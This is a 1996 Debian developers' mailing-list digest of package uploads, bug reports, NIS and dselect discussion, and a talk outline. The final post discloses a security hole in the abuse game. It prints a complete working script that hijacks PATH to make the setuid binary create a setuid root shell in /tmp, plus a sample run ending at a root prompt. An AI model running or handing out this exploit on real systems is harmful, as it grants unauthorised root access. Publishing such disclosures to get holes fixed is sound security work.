debiandoc is now dwww

[Lars Wirzenius]

I converted my debiandoc package to the new source format and
changed its name to dwww (debiandoc is easy to confuse with
various other packages).

It's in master's Incoming now. I'd appreciate it if people could
try it out. It's sure to have lots of bug (which is why it's
called 1.0), and it's still missing important functionality
(full text search). It would be nice to at least get rid of the
bugs before 1.2.

-BEGIN PGP SIGNED MESSAGE-

Format: 1.5
Date: Tue, 24 Sep 1996 16:00:57 +0300
Source: dwww
Binary: dwww
Architecture: source i386
Version: 1.0-1
Distribution: unstable
Urgency: low
Maintainer: Lars Wirzenius <[EMAIL PROTECTED]>
Description: 
 dwww   - Read all on-line documentation via WWW
Changes: 
 dwww (1.0-1) unstable; urgency=low
 .
   * First release.
Files: 
 e5cd44fdbb5536bf6838b68d38d47de5 579 doc optional dwww_1.0-1.dsc
 7ddbde6cfa03e4c4c0d871583478a88f 23514 doc optional dwww_1.0.orig.tar.gz
 25a769ce2427dc6c3730bb676992bca0 2636 doc optional dwww_1.0-1.diff.gz
 dd3e247ae406c530b657ae3ae3b3f8df 29298 doc optional dwww_1.0-1_i386.deb

-BEGIN PGP SIGNATURE-
Version: 2.6.2i

iQCVAwUBMkf+FIQRll5MupLRAQGKwwP/Sv68ITkP5oqi1Nxhg/ZL99UwQf/vaLSJ
pfrcxfLA5Ij7is+9xUMVyjlXa3fVHGZM2Ab7g3xXA1ptDBnKYRWiXS7c61/HSBbp
0JZOdS1+7Psf47HAeatKSByRuesJvqjlAOgQT3Tjpg1Jy9XLDpr09YOub/Vafa0z
YvwPP37k0bg=
=HwYW
-END PGP SIGNATURE-

-- 
Please read  before mailing me.
Please don't Cc: me when replying to my message on a mailing list.




pgp0vOLrRm4gT.pgp
Description: PGP signature

Bug#4574: gs -g flag does not work

[joost witteveen]

> 
> Package: gs
> Version: 4.01-4
> 
> The commands
> 
> $ gs -g100x100 some_postscript_file.ps
> $ gs -dDEVICEWIDTH=100 -dDEVICEHEIGHT=100 some_postscript_file.ps
> $ gs some_postscript_file.ps
> all produce the same results.

OK in the second case, gs gets executed with:
gs -dDEVICEHEIGHTPOINTS=842 -dDEVICEWIDTHPOINTS=595 -dDEVICEWIDTH=100 
-dDEVICEHEIGHT=100 Q.ps

and gs usually only uses the last defention on the commandline, but here
it apparently uses the first one. So, I'll indeed have to change
the wrapper. Thanks



-- 
joost witteveen
[EMAIL PROTECTED]
  [EMAIL PROTECTED]
--
Use Debian/GNU Linux!

Bug#4575: World writable file

[D. Charalambous]

Package: xgalaga
Version: 1.6c-1

 The file /usr/games/xgalaga/.xgalscores  is world writable. The above file
 should not be world writable because any user can edit the score table.
 xgal is not sgid aware, so fixing this problem may not just be a case
 of changing permissions.

Bug#4576: World writable directories

[D. Charalambous]

Package: Perl
Version: 5.003-2

  The following directories are world writable. This could cause problems in 
  scripts which trust these directories. 

drwxrwxrwx   root root  /usr/lib/perl5/i486-linux
drwxrwxrwx   root root  /usr/lib/perl5/File
drwxrwxrwx   root root  /usr/lib/perl5/auto
drwxrwxrwx   root root  /usr/lib/perl5/auto/DynaLoader
drwxrwxrwx   root root  /usr/lib/perl5/auto/Socket

My subscriptions to debian-*@lists.debian.org

[Ian Jackson]

I mailed Bruce to ask him to ensure that my subscriptions were
changed, because my machine's mail name is changing from
chiark.chu.cam.ac.uk to chiark.greenend.org.uk.

I had no response before I stopped receiving mail at the old name; my
mail at chiark.greenend.org.uk is being delayed at the moment too.

The postmaster for chu.cam.ac.uk reports that mail is still arriving
for [EMAIL PROTECTED]

Something must be done.

Furthermore, the mailing list archives aren't working, so I can't read
the lists that way.

Ian.

Bug#4580: satrt-stop-daemon does not kill process

[Yves Arrouye]

marin62# !/2:38
/etc/init.d/apache stop
no /usr/sbin/apache found; none killed.
marin63# !ps   2:38
ps -aex | grep apache
 9448  p4 S0:01 ssh -l root localhost cd 
/home/arrouye/src/public/apache/apache-1.1.1; exec make -f debian/rules 
binary-root INFOPATH=/usr/local/lib/texmf/doc/info:/usr/info:/usr/local/info 
LOGNAME=arrouye VISUAL=/usr/bin/vi PAGER=less 
MAPFILE=/usr/local/lib/texmf/dvips/psfonts.map 
MTP_DESTDIR=/usr/local/texmf/fonts/tmp/pk TERMCAP=co#80:li#25: TERM=xterm 
VARTEXMF=/usr/local/texmf TCL_LIBRARY=
 9988  p3 S0:00 grep apache USER=root LOGNAME=root HOME=/root 
PATH=/usr/local/bin:/opt/bin:/usr/bin:/usr/bin/pbmplus:/bin:/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin/X11:/usr/bin/X11:/usr/local/java/bin:/usr/games:/usr/local/texmf/bin/linux/ix86/aout:/usr/local/texmf/bin:/usr/local/Amaya/bin:.
 MAIL=/var/spool/mail/root SHELL=/usr/bin/zsh SSH_CLIENT=127.0.0.1 1023 22 
SSH_TTY=/dev/ttyp3 TERM
 9990  ?  S0:00 sh /usr/sbin/apachemodname ../src/mod_cern_meta.c 
INFOPATH=/usr/local/lib/texmf/doc/info:/usr/info:/usr/local/info LOGNAME=root 
VISUAL=/usr/bin/vi MAIL=/var/spool/mail/root PAGER=less 
MAPFILE=/usr/local/lib/texmf/dvips/psfonts.map 
MTP_DESTDIR=/usr/local/texmf/fonts/tmp/pk TERM=dumb names=mod_alias mod_userdir 
mod_cgi mod_auth mod_auth_dbm mod_auth_db mod_auth_anon mod_auth_msq
  231  ?  S0:00 /usr/sbin/apache INIT_VERSION=sysvinit-2.64 previous=N 
TERM=linux HOSTTYPE=i386 PATH=/bin:/usr/bin:/sbin:/usr/sbin 
CONSOLE=/dev/console HOME=/ PREVLEVEL=N RUNLEVEL=5 SHELL=/usr/bin/zsh 
runlevel=5 AUTOBOOT=YES BOOT_IMAGE=linux OSTYPE=Linux SHLVL=2 
_=/usr/sbin/start-stop-daemon 
  232  ?  S0:00 (apache)
  233  ?  S0:00 /usr/sbin/apache INIT_VERSION=sysvinit-2.64 previous=N 
TERM=linux HOSTTYPE=i386 PATH=/bin:/usr/bin:/sbin:/usr/sbin 
CONSOLE=/dev/console HOME=/ PREVLEVEL=N RUNLEVEL=5 SHELL=/usr/bin/zsh 
runlevel=5 AUTOBOOT=YES BOOT_IMAGE=linux OSTYPE=Linux SHLVL=2 
_=/usr/sbin/start-stop-daemon 
  234  ?  S0:00 /usr/sbin/apache INIT_VERSION=sysvinit-2.64 previous=N 
TERM=linux HOSTTYPE=i386 PATH=/bin:/usr/bin:/sbin:/usr/sbin 
CONSOLE=/dev/console HOME=/ PREVLEVEL=N RUNLEVEL=5 SHELL=/usr/bin/zsh 
runlevel=5 AUTOBOOT=YES BOOT_IMAGE=linux OSTYPE=Linux SHLVL=2 
_=/usr/sbin/start-stop-daemon 
  887  ?  S0:00 /usr/sbin/apache INIT_VERSION=sysvinit-2.64 previous=N 
TERM=linux HOSTTYPE=i386 PATH=/bin:/usr/bin:/sbin:/usr/sbin 
CONSOLE=/dev/console HOME=/ PREVLEVEL=N RUNLEVEL=5 SHELL=/usr/bin/zsh 
runlevel=5 AUTOBOOT=YES BOOT_IMAGE=linux OSTYPE=Linux SHLVL=2 
_=/usr/sbin/start-stop-daemon 
 1250  ?  S0:00 /usr/sbin/apache INIT_VERSION=sysvinit-2.64 previous=N 
TERM=linux HOSTTYPE=i386 PATH=/bin:/usr/bin:/sbin:/usr/sbin 
CONSOLE=/dev/console HOME=/ PREVLEVEL=N RUNLEVEL=5 SHELL=/usr/bin/zsh 
runlevel=5 AUTOBOOT=YES BOOT_IMAGE=linux OSTYPE=Linux SHLVL=2 
_=/usr/sbin/start-stop-daemon 
 1386  ?  S0:00 (apache)
 1396  ?  S0:00 (apache)
 1400  ?  S0:00 (apache)
 3198  ?  S0:00 (apache)
marin64# cat /var/run/apache/apache.pid2:38
227
marin65# ps -ax | grep 227 2:40
10273  p3 S0:00 grep 227 
marin66#   2:40

The problem is that some processes spawned by the non-existing 227 process
still do exist, and lock some resources. Is it possible to do something about
that?

(I doubt it is possible, but I hope so...)

Yves.

-- 
Yves Arrouye  Email: [EMAIL PROTECTED]
7, avenue Leon BolleeWeb: http://www.fdn.fr/~yarrouye/
75013 Paris  Work: +33 45 95 64 59
France   Home: +33 53 61 09 55

Bug#4581: "libpaper" doesn't build...

[llucius]

Package: libpaper
Version: 1.0.3-1

While attempting to build libpaper, I received the following message:

make[2]: Entering directory `/bld/src/new/libpaper-1.0.3/src'
gcc -O2   -c paperconf.c -o paperconf.o
paperconf.c:9: paper.h: No such file or directory
make[2]: *** [paperconf.o] Error 1
make[2]: Leaving directory `/bld/src/new/libpaper-1.0.3/src'
make[1]: *** [all] Error 2
make[1]: Leaving directory `/bld/src/new/libpaper-1.0.3'
make: *** [build] Error 2

It appears that overriding CFLAGS in "debian/rules" is the culprit.

Leland

__ Y_ a_ m_ b_ o_ | The leanest, meanest, fightinest sweet tater on Earth!
   oo o  oo o  o  | 
o   o   o | [EMAIL PROTECTED]
 o ooo o  | 
-- -- -- -- -- -- | http://www.millcomm.com/~llucius   (maybe one day)

Bug#4568: a2ps binary still a.out

[Yves Arrouye]

 Yves Arrouye writes:
 Yves>  I'd like to take the a2ps package if its maintainer does not plan to
 Yves> maintain it anymore: I have patches to make it work with libpaper
 Yves> that I'd like to see in the Debian version.

   To best of my knowledge, a2ps and a2gs are orphaned. Casual inspection of the
   packages on my mirror reveals that they were created in February and
   September of 1995, respectively.  Yep, that's twelve, or nineteen *months*
   ago. 

   I would prefer it if you patched the more useful enscript (successor to
   genscript). Or psutils, dvips, ...  in short: programs that people use and
   maintain. But you are of course free to do whatever you personally
   prefer. Just my 0.02 centimes.

I use a2ps a lot, and know other people who do that too. So I'd like to
package it.

I did change psutils to support libpaper. I emailed the changes to the
package maintainer, who forwarded them to Angus, who said he'll consider
them for a next release (the psutils maintainer does not want to make
such a big change to psutils; I'll send Angus my latest patches for
libpaper 1.x and ask for his decision).

As for enscript and dvips, I really do not have the time... Sorry. But
it shouldn't be difficult.

Yves.

Bug#4577: World writable directory

[D. Charalambous]

Package: texbin
Version: 3.1415-5

  The following directory is created world writable: 
  /var/spool/texmf/fonts/pk/deskjet

  It is not clear which package the above directory belongs to but it looks
  like it belongs to tex.

 

mime-support 2.03-1 released

[Brian C. White]

-BEGIN PGP SIGNED MESSAGE-

Format: 1.5
Date: Thu, 24 Sep 1996 12:01:22 +0400
Source: mime-support
Binary: mime-support
Architecture: source all
Version: 2.03-1
Distribution: unstable
Urgency: low
Maintainer: Brian White <[EMAIL PROTECTED]>
Description: 
 mime-support - MIME files 'mime.types' & 'mailcap', and support programs
Changes: 
 mime-support (2.03-1) unstable; urgency=low
 .
   * added "application/x-httpd-php" type
   * added defaults to install-mime prompts
Files: 
 a0e5cfd6eac6a01ee2333512adebbd5b 521 net standard mime-support_2.03-1.dsc
 6f6b4a69bf7e732732d2e9fa7f53fb0c 18487 net standard mime-support_2.03.tar.gz
 aac01bca992bf2012abdb678ff20018a 21288 net standard mime-support_2.03-1_all.deb

-BEGIN PGP SIGNATURE-
Version: 2.6.2i

iQCVAwUBMkgadrwRa6IPcXgFAQHXAwP/fhUqBKRrNUcZlIsYDxQovVmkWE6Gcymt
EJksl4C0yg3bcvzZEWBkbunIHKGLCzAuZ54Q0IEP2HgbeJeB3v/EdGNqLbFalGt6
mtpMHnjpKXc1OvTT4ajUZFrl0BaZ1+HNB5IFOW4TzqX9oL6h4obzvQYCGrIcm8Pj
oe3WaXV+eAk=
=19L9
-END PGP SIGNATURE-

Bug#4582: mh `inc' can't lock mailbox

[Rob Leslie]

Package: mh
Version: 6.8.4-7

After installing the new mh package (from 6.8.4-2) I find that `inc' waits
several seconds and then reports:

inc: unable to lock and fopen /var/spool/mail/rob

According to /etc/mh/mtstailor, "lockstyle: 1" apparently means to do the
correct form of Debian mailbox locking, however `inc' isn't setgid mail so it
can't create the lock file.

Thanks.

-- 
Robert Leslie
[EMAIL PROTECTED]

First draft outline for my EurOpen.SE talk

[Lars Wirzenius]

Also included below, this one time.

   Topic: Linux in general and Debian in particular.
   
   Time: about two hours (including pauses?).
   
   Utilities: overhead, possibly a computer.
   
   Audience: about 200 people, admin types
1. Introduction
  + overview of talk
  + my background, briefly
2. Linux
  + Linux is a free (GPL) Unix-like kernel, written by LT
  + Interesting features:
   o multi-platform: Intel, Alpha, Motorol 68K, Sparc,
 PowerPC, ...
   o loadable modules
   o good memory management
   o a little SMP support
   o lots of drivers
   o all the usual Unix stuff
  + Distributions
   o Linus does the kernel only (and not all of that)
   o Other people package the kernel + other programs +
 installation tools and instructions = distribution
   o Debian, Red Hat, Slackware, Yggdrasil, and many others
   o Mostly the same programs, but big differences in
 packaging
  + Commercial interest
   o Caldera
   o Ports of commercial programs: ...
   o Native commercial programs: ...
  + Support
   o The Net: WWW, newsgroups, mailing lists, irc
   o Linux Documentation Project: free books
# Installation and Getting Started, by Matt Welsh
# Network Administrators' Guide, by Olaf Kirch
# System Administrators' Guide, by Lars Wirzenius
# Programmers' Guide (?)
# Users' Guide (?)
# FAQ's and HOWTO's, by lots of people
# from the net and commercially
   o Commercial books
# Running Linux, by Matt Welsh and Lar Kaufmann
   o Linux Journal
   o From commercial distributors for money: ...
  + Plans for future
   o better SMP support
   o keep ahead of the pack
  + Contact info
   o http://www.linux.org/
   o http://sunsite.unc.edu/~mdw/linux/
3. Debian
  + How Debian is different
   o goals: free, best, can be used as a base
   o volunteer project
   o packaging system
   o bug database
   o
  + The packaging system
   o best of all the free ones, possibly of all
   o extensive use of dependencies
   o multiple levels of dependencies
   o both source and binary packages
   o multi-platform support
   o
  + Available packages
   o The base system
   o main/contrib/non-free
   o admin, comm, devel, doc, editors, games, graphics, mail,
 math, misc, net, news, shells, sound, tex, text, x11
   o all of the usual freeware stuff: gcc, Emacs, TeX,
 XFree86, ...
   o very little commercial stuff
  + History
   o started by Ian M in 199x
   o support from the FSF
   o version 1.1 in June, 1996
   o
   o
   o
  + Plans for future
   o to boldly go, where no distribution has gone before
  + Contact info
   o http://www.debian.org/
4. Why Linux? Why Debian?
  + ?


-- 
Please read  before mailing me.
Please don't Cc: me when replying to my message on a mailing list.




pgpC2f47sjFsR.pgp
Description: PGP signature

Bug#4583: popclient compiled without APOP support

[Dirk . Eddelbuettel]

Package: popclient
Version: 3.05-3   

Popclient doesn't work in APOP mode (which md5 hashes passwords so that they
don't travel in cleartext anymore) which is too bad as I just installed it to
get APOP ...

There are two problems in the package. First, configure has to be told that
APOP is desired. Second, there is actually a buglet in the upstream source.

This patch fixed both problems for me.


diff -up popclient-3.05.orig/debian.rules popclient-3.05/debian.rules
--- popclient-3.05.orig/debian.rulesTue Sep 10 16:24:33 1996
+++ popclient-3.05/debian.rules Wed Sep 25 00:09:38 1996
@@ -19,7 +19,7 @@ build:

 config:
CC="$(CC)" CFLAGS="$(CFLAGS)" LDFLAGS="$(LDFLAGS)" \
-  ./configure --prefix=/usr
+  ./configure --prefix=/usr --with-APOP
touch stamp-config

 clean:
diff -up popclient-3.05.orig/pop3.c popclient-3.05/pop3.c
--- popclient-3.05.orig/pop3.c  Wed Aug 28 18:34:41 1996
+++ popclient-3.05/pop3.c   Wed Sep 25 00:27:46 1996
@@ -99,7 +99,9 @@ struct hostrec *queryctl;

 #if defined(HAVE_APOP_SUPPORT)
   /* build MD5 digest from greeting timestamp + password */
-  if (queryctl->whichpop == P_APOP)
+  if (queryctl->protocol == P_APOP)  /* changed from queryctl->whichpop
+   which doesn't exist in the structure
+   [EMAIL PROTECTED]  24 Sep 96 */
 if (POP3_BuildDigest(buf,queryctl) != 0) {
   ok = PS_AUTHFAIL;
   goto closeUp;  




-- 
Dirk Eddelb"uttel http://qed.econ.queensu.ca/~edd

Re: dpkg changes and queries - the answers to your questions

[Guy Maor]

There's probably no point in making patches that Ian disapproves of, as
he'll just change them back.


Guy

Uploaded: bind_4.9.4-P1-1

[Rob Leslie]

Uploaded to master.debian.org.


-BEGIN PGP SIGNED MESSAGE-

Date: 25 Sep 96 04:18 UT
Format: 1.6
Distribution: unstable stable
Urgency: High
Maintainer: Robert Leslie <[EMAIL PROTECTED]>
Source: bind
Version: 4.9.4-P1-1
Binary:  bind
Architecture:  i386 source
Description: 
 bind: An Internet domain name server.
Changes:
 * New upstream version; addresses security concerns (Bug#4503)
 * You can now type `none' instead of `NONE' (Bug#3478)
 * Less fascist postinst (Bug#3507)
 * Reverse zone now provided for entire 127.in-addr.arpa (Bug#4296)
 * /var/named/named.boot no longer a conffile (can be auto-generated)
 * New packaging format
Files:
 cc8b713407823bf57b869783e364fd65  1649981  net  -  bind_4.9.4-P1-1.tar.gz
 bdd8c9b617e97bc38d045aa90507  8367  net  -  bind_4.9.4-P1-1.diff.gz
 9a45325c6e0962dcc97dab772be65664  546322  net  extra  bind_4.9.4-P1-1_i386.deb

-BEGIN PGP SIGNATURE-
Version: 2.6.2

iQCVAwUBMki0aG2QJIfwC8CVAQHAegQAgeEiYSJGx0q/egDo2Eh2tYzzgsGi5R83
ad6cjUsZ6Mb9q8lFgdIR/BF0mGjLgEL0KkPzttsde4Fw8Qb4OTbdCKFHgcf/Qq5m
gQbRePNL/eZBO12vHuMonvrmVm6FcXGTKCVxkfx2xAlAXMDikGqltXtrSbGPfVk7
nw7xHodRQdo=
=A/Jr
-END PGP SIGNATURE-


-- 
Robert Leslie
[EMAIL PROTECTED]

Bug#4582: mh `inc' can't lock mailbox

[James A. Robinson]

> According to /etc/mh/mtstailor, "lockstyle: 1" apparently means to do the
> correct form of Debian mailbox locking, however `inc' isn't setgid mail so it
> can't create the lock file.

Just sticking in my two cents.

I'm curious as to what changed on Debian to make this a requirement
for mail programs.  Pine, mail, tkmail, and of course inc are not sgid
mail.  Elm is the only one i've got on my system which is sgid mail.

In any case the mail spool on my Linux box, now that I look at it, is
odd:
drwxrwxr-t   3 root root 1024 Aug 25 10:18 /var/mail

Shouldn't it be group mail, or else set w permission of the user?
Those are the two methods I'm familiar with (preferring the former).


Jim

-- 
Jim Robinson <[EMAIL PROTECTED]> - http://www.simons-rock.edu/~jimr/
Simon's Rock College.

Re: Bug#4575: World writable file

[Christoph Lameter]

This is a game after all. I dont think we should worry about someone
editing the scores file.

I cannot see any other games that I have installed from the Debian
distribution to be using setgid. What is the custom of doing things under
debian?

On Tue, 24 Sep 1996, D. Charalambous wrote:

95dmc>Package: xgalaga
95dmc>Version: 1.6c-1
95dmc>
95dmc> The file /usr/games/xgalaga/.xgalscores  is world writable. The above 
file
95dmc> should not be world writable because any user can edit the score table.
95dmc> xgal is not sgid aware, so fixing this problem may not just be a case
95dmc> of changing permissions.
95dmc>

{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}
{}Snail Mail:   FTS Box 466, 135 N.Oakland Ave, Pasadena, CA 91182{}
{}FISH Internet System Administrator at Fuller Theological Seminary   {}
{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}
PGP Public Key  =  FB 9B 31 21 04 1E 3A 33  C7 62 2F C0 CD 81 CA B5 

Bug#4585: passwd is not NIS compatible

[Dominik Kubla]

Package: passwd
Version: 1.0-5

When encountering NIS overide entries (like "+kubla::") while changing
a local password, the programm will fill the empty fields with the string
"(null)".

Bug#4586: less cannot deal with zero-length files

[Wichert Akkerman]

Package: less
Version: 321

Apparently someone decided that looking at zero-length files is not very
usefull and put the helpscreen instead. These commands show the error:

> touch lesstest
> less lesstest

By which less promptly responds by showing me how it should be used.

Grtz,
  Wichert.

Bug#4587: ncftp has no online documentation

[Dominik Kubla]

Package: ncftp
Version: 2.3.0-6

This package has neither manual nor info pages. It also does install the
copyright file as /usr/doc/ncftp/copyright instead of /usr/doc/copyright/ncftp.

Bug#4587: ncftp has no online documentation

[Dirk . Eddelbuettel]

  Dominik> Package: ncftp 
  Dominik> Version: 2.3.0-6
  Dominik> 
  Dominik> This package has neither manual nor info pages.

That is fixed in both versions -7 and -8. Please upgrade.

  Dominik>  It also does install the copyright file as
  Dominik> /usr/doc/ncftp/copyright instead of /usr/doc/copyright/ncftp.

This is correct. Please read the Debian Policy manual, section 3.2.6. The
Policy and Programmers manuals are installed by the dpkg-dev package into the
/usr/doc/dpkg/{programmer,policy}.html directories. Postscript and Html
versions are also on the ftp site in doc/package-developer.

--
Dirk Eddelb"uttel http://qed.econ.queensu.ca/~edd

Access to debian-devel mailing list

[Dale Miller]

I took myself off the debian-devel mailing list a while
back. Could I be resubscribed please. The web page no
longer allows you to subscribe to this mailing list

Thanks Dale

[EMAIL PROTECTED]

Bug#4585: passwd is not NIS compatible

[Guy Maor]

On Wed, 25 Sep 1996, Dominik Kubla wrote:

> When encountering NIS overide entries (like "+kubla::") while changing
> a local password, the programm will fill the empty fields with the string
> "(null)".

I can't duplicate this.  On my system, `+kubla::' gets replaced
with `+kubla::0:0:::'.  People knowledgable about NIS told me that was
ok.

The only thing I can think of that might be causing some problem is
your running a different libc with a broken fgetpwent().  I'm running
libc5_5.2.18-11.  So please tell me which version you're running, and
also send me if the following code outputs anything besides
`+kubla::0:0:::'.

#include 
#include 
#include 
#include 
int main() {
  FILE *f;
  struct passwd *p;
  f = tmpfile();
  fprintf(f, "+kubla::\n");
  rewind(f);
  p = fgetpwent(f);
  if (!p->pw_passwd || *p->pw_passwd)
fprintf(stderr, "broken - %s\n", p->pw_passwd);
  putpwent(p, stdout);
}


Guy

Problems with dselect...

[Michael Dillon]

-- Forwarded message --
Date: Wed, 25 Sep 1996 00:50:32 -0400
From: Jon Lewis <[EMAIL PROTECTED]>
Reply-To: Linux Servers mailing list <[EMAIL PROTECTED]>
To: Multiple recipients of list SERVER-LINUX <[EMAIL PROTECTED]>
Subject: Re: Out of ptys

On Tue, 24 Sep 1996, Michael Dillon wrote:

> Stop right there. This is a list for SERVER's. Format your hard drive and
> install RedHat http://www.redhat.com or Debian http://www.debian.org

Since traffic has been relatively sparse, I hope people won't mind a
slightly off-topic followup.

Is it just me, or is the Debian distribution's install system (dselect)
horribly user unfriendly?  I had to setup a new linux box for a friend a
few days ago, and thought it would be a perfect chance to try out Debian.
Having no time for look for an RTFM, I just jumped in, made the necessary
boot and install floppies, booted them, installed the "base system" and
tried installing the rest.  That's where things went downhill real fast.

Getting dselect to install the packages I wanted was a real pain...it kept
bitching at me about dependancies and requirements, and the end result was
my booting slackware and installing slackware 3.1.

One day, when I have some spare time, I'll go looking for the manual
(assuming there is one) on dselect, so I can try again...or maybe I should
give Red Hat another shot.  I tried it briefly over a year ago, and hated
it.  I like/respect a lot of the Debian developers though...so I think I'd
be happer with it, if I could just install the darn thing.


--
 Jon Lewis <[EMAIL PROTECTED]>  |  Unsolicited commercial e-mail will
 Network Administrator   |  be proof-read for $199/hr.
Finger [EMAIL PROTECTED] for PGP public key___

Re: Problems with dselect...

[Michael Dillon]

-- Forwarded message --
Date: Tue, 24 Sep 1996 22:51:31 -0700
From: Ken Rea <[EMAIL PROTECTED]>
Reply-To: Linux Servers mailing list <[EMAIL PROTECTED]>
To: Multiple recipients of list SERVER-LINUX <[EMAIL PROTECTED]>
Subject: Re: Out of ptys

Yep, I didn't care much for dselect either.  I can understand what they
are trying to do but I think it is overly complex.  What I ended up doing
was installing the most of it then going in and changing a lot of the
startup stuff to the slack ware style that I'm used to.

That has worked rather well.  It took a bit of time but the server runs
like I want it to.  There is a nice mix of the admin stuff that comes with
the debian and the rest is straight forward like the slackware is.  If
anything needs to be updated I just get the package from where ever it
comes from and update it my self with out the dselect program.  I think it
works better that way.

Ken Rea

On Wed, 25 Sep 1996, Jon Lewis wrote:

> On Tue, 24 Sep 1996, Michael Dillon wrote:
>
> > Stop right there. This is a list for SERVER's. Format your hard drive and
> > install RedHat http://www.redhat.com or Debian http://www.debian.org
>
> Since traffic has been relatively sparse, I hope people won't mind a
> slightly off-topic followup.
>
> Is it just me, or is the Debian distribution's install system (dselect)
> horribly user unfriendly?  I had to setup a new linux box for a friend a
> few days ago, and thought it would be a perfect chance to try out Debian.
> Having no time for look for an RTFM, I just jumped in, made the necessary
> boot and install floppies, booted them, installed the "base system" and
> tried installing the rest.  That's where things went downhill real fast.
>
> Getting dselect to install the packages I wanted was a real pain...it kept
> bitching at me about dependancies and requirements, and the end result was
> my booting slackware and installing slackware 3.1.
>
> One day, when I have some spare time, I'll go looking for the manual
> (assuming there is one) on dselect, so I can try again...or maybe I should
> give Red Hat another shot.  I tried it briefly over a year ago, and hated
> it.  I like/respect a lot of the Debian developers though...so I think I'd
> be happer with it, if I could just install the darn thing.
>
>
> --
>  Jon Lewis <[EMAIL PROTECTED]>  |  Unsolicited commercial e-mail will
>  Network Administrator   |  be proof-read for $199/hr.
> Finger [EMAIL PROTECTED] for PGP public key___
>

Ken Rea
[EMAIL PROTECTED]

Bug#4585: passwd is not NIS compatible

[Dominik Kubla]

> I can't duplicate this.  On my system, `+kubla::' gets replaced
> with `+kubla::0:0:::'.  People knowledgable about NIS told me that was
> ok.

My bug-report was inaccurate:

It happens when passwd encounters a "+kubla" entry (without colons).
Then it will insert something like:

+kubla:(null):5999:103:(null):(null):(null)

chosing apparently random values for uid/gid. The installed libc version
is 5.2.18-11.

Dominik
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
The text above represents my personal opinion and does not represent the
official position of my employer on the issue(s) discussed.
Any official statement made on behalf of my employer by me is marked as such.

Bug#4588: dpkg-source can not handle binary files in source tree.

[Dominik Kubla]

Package: dpkg
Version: 1.4.0.1

dpkg-buildpackage fails to build packages with binary data files in the source
tree because dpkg-source bails out when doing the diffs.  This prevents the
build of the kbd package.

Bug#4589: at rereads /etc/group each minute

[Christoph Lameter]

Package: at
Version: 2.9b-1

The at command seems to reread /etc/group each minute or so. If run with
ypbind this will cause an extraordinary load on the network and nis
servers.

I had to switch of the at runs on all my machines that run NIS since we
have a group for each of our 600 or so users and were experiencing strange
network loads.

Bug#4590: dpkg version compare with epochs is broken

[Guy Maor]

Package: dpkg
Version: 1.4.0

dpkg compares falsely when the implict 0 epoch is made explicit.

$ dpkg --compare-versions '0:2' eq '0:2' ; echo $?
1
$ dpkg --compare-versions '1:2' gt '0:2' ; echo $?
1
$ dpkg --compare-versions '1:2' eq '0:2' ; echo $?
0

Bug#4585: passwd is not NIS compatible

[Guy Maor]

On Wed, 25 Sep 1996, Dominik Kubla wrote:

> It happens when passwd encounters a "+kubla" entry (without colons).
> Then it will insert something like:
> 
> +kubla:(null):5999:103:(null):(null):(null)
> 
> chosing apparently random values for uid/gid. The installed libc version
> is 5.2.18-11.

According to passwd(5), an entry of `+kubla' is illegal.  You must
specify all 7 fields, so you should use `+kubla::'.  All NIS
documentation I've seen says to use the colons.

If you really think getpwent(3) and fgetpwent(3) should behave properly
when presented with corrupt lines (presumably filling the remaining
entries with "" or 0), then I'll refile the bug to libc5.  Otherwise
I'll close it.


Guy

NIS storms

[Christoph Lameter]

We had severe problems with our Campus Network which is fully based on
Debian. We are using the "one group a user" approach that is Debian
standard. We are running two NIS Servers one master one slave and a couple
of Server that utilize these two main NIS Servers.

I finally ran one of those in debug mode and had the following
observations:

- The group.byname database was completely read by other machines
  continuously.
- The ypserv process was running most of the time and was not
  able to satisfy all those requests.

It turns out that there is a subroutine initgroups in the standard c
library that attempts to figure out what groups a user belongs to and does
an exhaustive search of /etc/groups. That procedure is called by cron,
login and all important tools. Its called at least for each command
executed by cron and if you run "at" each minute the /etc/group file will
be scanned or a huge number of network transfers will take place.

A couple of machines running with NIS can bring down the yp process and
cause a lot of trouble on the network.

I have solved this problem for now by copying the master /etc/group to all
major machines and removed the +:: stuff from machines that are not so
important to disable those lookups.

How can we solve this issue? Perhaps we should go back to the old approach
of putting users into one group?

Bug#4585: passwd is not NIS compatible

[Dominik Kubla]

I think a refile should be done, because (at least to my knowledge) the
usage of "[+-]login" as NIS notation is widespread.

Pleas note that this also happens when there are netgroup entries and

[EMAIL PROTECTED]

is a legal netgroup entry.

Dominik

IMPORTANT: abuse security hole. Debian is vunerable!

[Joey Hess]

I applied this crack script to my system, with abuse 1.10-4 installed, and
it got me a root shell. I'm posting to debian-devel because I believe this
is a really old and well known hole in abuse, so I see no point in covering
this up.

Here's the script:

--cut---

echo  abuser.sh - gain root on Linux Red Hat 2.1 system
echo  Checking system vulnerability
if test -u /usr/lib/games/abuse/abuse.console
then
echo  System appears vulnerable.
cd /tmp
cat << _EOF_ > /tmp/undrv
#!/bin/sh
/bin/cp /bin/sh /tmp/abuser
/bin/chmod 4777 /tmp/abuser
_EOF_
chmod +x /tmp/undrv
PATH=/tmp
echo  Executing Abuse
/usr/lib/games/abuse/abuse.console
/bin/rm /tmp/undrv
if test -u /tmp/abuser
then
echo  Exploit successful, suid shell located in
/tmp/abuser
else
echo  Exploit failed
fi
else
echo  This machine does not appear to be vulnerable.
fi

--cut--

Here's a sample of it in use:

[EMAIL PROTECTED] /tmp>sh abuse_hole 
 abuser.sh - gain root on Linux Red Hat 2.1 system
 Checking system vulnerability
 System appears vulnerable.
 Executing Abuse
 Abuse (Engine Version 1.10)
sh: lnx_sdrv: command not found
sound effects driver returned failure, sound effects disabled
Added himem block (400 bytes)
could not run undrv, please make sure it's in your path
No network driver, or network driver returned failure
Specs : main file set to abuse.spe
Lisp : 501 symbols defined, 99 system functions, 295 pre-compiled
functions
Unable to open filename art/dev.spe for requested item c_mouse1
 Exploit successful, suid shell located in /tmp/abuser
[EMAIL PROTECTED] /tmp>abuser
bash# id
uid=500(joey) gid=500(joey) euid=0(root)
groups=500(joey),20(dialout),24(cdrom),26(tape),100(users),518(pub),520(network)
bash# whoami
root
bash# 

